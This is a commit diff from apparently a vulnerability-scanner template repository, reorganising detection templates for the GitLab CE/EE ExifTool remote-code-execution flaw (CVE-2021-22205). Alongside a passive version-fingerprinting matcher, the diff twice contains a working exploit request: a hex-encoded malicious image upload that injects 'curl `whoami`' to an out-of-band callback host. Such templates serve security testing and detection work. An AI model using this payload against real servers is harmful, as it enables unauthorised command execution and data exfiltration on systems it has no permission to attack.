CVE-2021-22205 update (#3568)
*moved cves/2021/CVE-2021-22205.yaml to vulnerabilities/gitlab/gitlab-rce.yaml *template extension update + added missing severity + misc updatespatch-1
parent
e0a2d35a8d
commit
1b0c7f1b7f
|
@ -1,127 +0,0 @@
|
||||||
id: CVE-2021-22205-fingerprint
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool (No Exploit)
|
|
||||||
author: GitLab Red Team
|
|
||||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
|
||||||
reference:
|
|
||||||
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
|
|
||||||
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
|
|
||||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
|
|
||||||
- https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
|
|
||||||
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
|
|
||||||
- https://hackerone.com/reports/1154542
|
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
|
|
||||||
tags: cve,cve2021,gitlab,rce,oast,fingerprinting
|
|
||||||
classification:
|
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
|
||||||
cvss-score: 9.90
|
|
||||||
cve-id: CVE-2021-22205
|
|
||||||
cwe-id: CWE-20
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/users/sign_in"
|
|
||||||
redirects: true
|
|
||||||
max-redirects: 3
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
condition: or
|
|
||||||
words:
|
|
||||||
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
|
|
||||||
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
|
|
||||||
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
|
|
||||||
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
|
|
||||||
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
|
|
||||||
- "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
|
|
||||||
- "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
|
|
||||||
- "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
|
|
||||||
- "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
|
|
||||||
- "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
|
|
||||||
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
|
|
||||||
- "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
|
|
||||||
- "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
|
|
||||||
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
|
|
||||||
- "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
|
|
||||||
- "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
|
|
||||||
- "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
|
|
||||||
- "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
|
|
||||||
- "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
|
|
||||||
- "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
|
|
||||||
- "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
|
|
||||||
- "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
|
|
||||||
- "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
|
|
||||||
- "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
|
|
||||||
- "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
|
|
||||||
- "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
|
|
||||||
- "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
|
|
||||||
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
|
|
||||||
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
|
|
||||||
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
|
|
||||||
- "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
|
|
||||||
- "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
|
|
||||||
- "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
|
|
||||||
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
|
|
||||||
- "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
|
|
||||||
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
|
|
||||||
- "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
|
|
||||||
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
|
|
||||||
- "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
|
|
||||||
- "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
|
|
||||||
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
|
|
||||||
- "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
|
|
||||||
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
|
|
||||||
- "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
|
|
||||||
- "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
|
|
||||||
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
|
|
||||||
- "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
|
|
||||||
- "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
|
|
||||||
- "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
|
|
||||||
- "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
|
|
||||||
- "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
|
|
||||||
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
|
|
||||||
- "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
|
|
||||||
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
|
|
||||||
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
|
|
||||||
- "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
|
|
||||||
- "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
|
|
||||||
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
|
|
||||||
- "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
|
|
||||||
- "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
|
|
||||||
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
|
|
||||||
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
|
|
||||||
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
|
|
||||||
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
|
|
||||||
- "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
|
|
||||||
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
|
|
||||||
- "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
|
|
||||||
- "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
|
|
||||||
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
|
|
||||||
- "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
|
|
||||||
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
|
|
||||||
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
|
|
||||||
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
|
|
||||||
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
|
|
||||||
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
|
|
||||||
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
|
|
||||||
- "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
|
|
||||||
- "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
|
|
||||||
- "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
|
|
||||||
- "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
|
|
||||||
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
|
|
||||||
- "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
|
|
||||||
- "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
|
|
||||||
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
|
|
||||||
- "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
|
|
||||||
- "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
|
|
||||||
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
|
|
||||||
- "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
|
|
||||||
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
|
|
||||||
extractors:
|
|
||||||
- type: regex
|
|
||||||
name: matched_hash
|
|
||||||
group: 1
|
|
||||||
regex:
|
|
||||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
|
@ -1,63 +1,128 @@
|
||||||
id: CVE-2021-22205
|
id: CVE-2021-22205
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: GitLab CE/EE Unauthenticated RCE using ExifTool
|
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
|
||||||
author: pdteam
|
author: GitLab Red Team
|
||||||
severity: critical
|
severity: critical
|
||||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
|
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
||||||
reference:
|
reference:
|
||||||
|
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
|
||||||
|
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
|
||||||
|
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
|
||||||
|
- https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
|
||||||
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
|
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
|
||||||
- https://hackerone.com/reports/1154542
|
- https://hackerone.com/reports/1154542
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
|
||||||
tags: cve,cve2021,gitlab,rce,oast
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||||
cvss-score: 9.90
|
cvss-score: 9.90
|
||||||
cve-id: CVE-2021-22205
|
cve-id: CVE-2021-22205
|
||||||
cwe-id: CWE-20
|
cwe-id: CWE-20
|
||||||
|
tags: cve,cve2021,gitlab,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- method: GET
|
||||||
- |
|
path:
|
||||||
GET /users/sign_in HTTP/1.1
|
- "{{BaseURL}}/users/sign_in"
|
||||||
Host: {{Hostname}}
|
|
||||||
Origin: {{BaseURL}}
|
|
||||||
|
|
||||||
- |
|
redirects: true
|
||||||
POST /uploads/user HTTP/1.1
|
max-redirects: 3
|
||||||
Host: {{Hostname}}
|
|
||||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
|
|
||||||
X-CSRF-Token: {{csrf-token}}
|
|
||||||
|
|
||||||
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
|
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- 'Failed to process image'
|
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
|
||||||
|
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
|
||||||
- type: word
|
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
|
||||||
part: interactsh_protocol # Confirms the DNS Interaction
|
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
|
||||||
words:
|
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
|
||||||
- "dns"
|
- "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
|
||||||
|
- "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
|
||||||
- type: status
|
- "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
|
||||||
status:
|
- "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
|
||||||
- 422
|
- "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
|
||||||
|
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
|
||||||
|
- "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
|
||||||
|
- "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
|
||||||
|
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
|
||||||
|
- "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
|
||||||
|
- "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
|
||||||
|
- "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
|
||||||
|
- "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
|
||||||
|
- "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
|
||||||
|
- "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
|
||||||
|
- "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
|
||||||
|
- "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
|
||||||
|
- "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
|
||||||
|
- "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
|
||||||
|
- "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
|
||||||
|
- "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
|
||||||
|
- "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
|
||||||
|
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
|
||||||
|
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
|
||||||
|
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
|
||||||
|
- "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
|
||||||
|
- "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
|
||||||
|
- "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
|
||||||
|
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
|
||||||
|
- "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
|
||||||
|
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
|
||||||
|
- "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
|
||||||
|
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
|
||||||
|
- "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
|
||||||
|
- "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
|
||||||
|
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
|
||||||
|
- "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
|
||||||
|
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
|
||||||
|
- "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
|
||||||
|
- "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
|
||||||
|
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
|
||||||
|
- "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
|
||||||
|
- "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
|
||||||
|
- "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
|
||||||
|
- "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
|
||||||
|
- "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
|
||||||
|
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
|
||||||
|
- "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
|
||||||
|
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
|
||||||
|
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
|
||||||
|
- "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
|
||||||
|
- "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
|
||||||
|
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
|
||||||
|
- "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
|
||||||
|
- "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
|
||||||
|
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
|
||||||
|
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
|
||||||
|
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
|
||||||
|
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
|
||||||
|
- "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
|
||||||
|
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
|
||||||
|
- "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
|
||||||
|
- "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
|
||||||
|
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
|
||||||
|
- "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
|
||||||
|
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
|
||||||
|
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
|
||||||
|
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
|
||||||
|
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
|
||||||
|
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
|
||||||
|
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
|
||||||
|
- "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
|
||||||
|
- "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
|
||||||
|
- "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
|
||||||
|
- "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
|
||||||
|
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
|
||||||
|
- "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
|
||||||
|
- "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
|
||||||
|
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
|
||||||
|
- "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
|
||||||
|
- "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
|
||||||
|
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
|
||||||
|
- "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
|
||||||
|
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
|
||||||
|
condition: or
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
name: csrf-token
|
|
||||||
internal: true
|
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- 'csrf-token" content="(.*?)" />\n\n<meta'
|
- '(?:application-)(\S{64})(?:\.css)'
|
||||||
|
|
||||||
- type: regex
|
|
||||||
name: whoami
|
|
||||||
part: interactsh_request
|
|
||||||
group: 1
|
|
||||||
regex:
|
|
||||||
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
|
|
|
@ -0,0 +1,63 @@
|
||||||
|
id: gitlab-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GitLab CE/EE Unauthenticated RCE using ExifTool
|
||||||
|
author: pdteam
|
||||||
|
severity: critical
|
||||||
|
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
|
||||||
|
reference:
|
||||||
|
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
|
||||||
|
- https://hackerone.com/reports/1154542
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.90
|
||||||
|
cve-id: CVE-2021-22205
|
||||||
|
cwe-id: CWE-20
|
||||||
|
tags: cve,cve2021,gitlab,rce,oast,intrusive
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /users/sign_in HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /uploads/user HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
|
||||||
|
X-CSRF-Token: {{csrf-token}}
|
||||||
|
|
||||||
|
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
|
||||||
|
